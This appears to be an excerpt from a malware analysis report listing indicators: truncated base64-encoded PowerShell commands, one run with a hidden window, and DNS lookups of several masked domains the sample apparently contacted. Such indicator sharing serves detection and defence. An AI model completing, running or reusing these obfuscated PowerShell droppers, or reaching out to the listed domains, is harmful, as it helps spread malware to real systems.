Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAG0AZgBzAHYAbQBsAG8AbgB4AHgAPQAnAEoAcQBpAG8AdwBvAG0AYwAnADsAJABDAG8AaQBsAGwAZwB4AG0AbgBvAHMAZQByAC...
- DNS ASK ti####ssmasti.com
- DNS ASK mi##n.xyz
- DNS ASK st###ella.xyz
- DNS ASK mo##mk.com
- DNS ASK le##bin.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAG0AZgBzAHYAbQBsAG8AbgB4AHgAPQAnAEoAcQBpAG8AdwBvAG0AYwAnADsAJABDAG8AaQBsAGwAZwB4AG0AbgBvAHMAZQByAC...' (with hidden window)